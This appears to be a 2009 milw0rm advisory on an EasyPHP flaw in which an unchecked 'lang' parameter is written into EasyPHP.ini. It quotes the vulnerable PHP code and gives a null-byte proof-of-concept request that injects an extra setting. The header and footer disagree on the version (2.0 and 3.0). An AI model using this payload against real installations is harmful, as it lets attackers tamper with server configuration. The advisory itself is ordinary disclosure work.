1
2 Bug : Arbitrary Modify Configuration File
3 Vendor : EasyPHP
4 Vendor URI : http://sourceforge.net/projects/quickeasyphp/
5 Product : EasyPHP 2.0
6 Author : Zigma [zigmatn @ gmail.com]
7 http://NullArea.NET
8
9 Description :
10
11 EasyPHP is a WAMP software bundle that installs web server services onto the Windows computer and allows quick−and−ea
sy development of PHP and MySQL on a localhost (also known as 127.0.0.1).
12 The package includes an Apache server, a MySQL database, and the PHP extension.
13
14 [+] Analyis :
15
16 A slight look on i18n.inc
17
18 if (isset($_GET[’lang’]) AND $_GET[’lang’] != $lang)
19 {
20
$fp = fopen($filename, "r");
21
$ini_contents = fread($fp, filesize($filename));
22
fclose($fp);
23
$ini_contents = str_replace("LangAdmin=".$lang, "LangAdmin=".$_GET[’lang’], $ini_contents); <−−
24
$fp = fopen($filename, "w");
25
fputs($fp,$ini_contents);
26
fclose($fp);
27
Header("Location: " . $_SERVER[’PHP_SELF’]);
28
exit;
29 }
30
31 EasyPHP does not verify user Input ( Lang parameter ) wich leads to arbitrary overwrite EasyPHP configuration file (E
asyPHP.ini) .
32
33 [+] Proof Of Concept :
34
35 The request :
36
37 http://localhost/index.php?lang=fr%00Lang=Overwritten
38
39 Results in overwriting EasyPHP.ini Adding the string "Lang=Overwritten".
40
41 # milw0rm.com [2009−05−11]
Page 1/1
EasyPHP 3.0 Arbitrary Modify Configuration File Vulnerability
Zigma
05/11/2009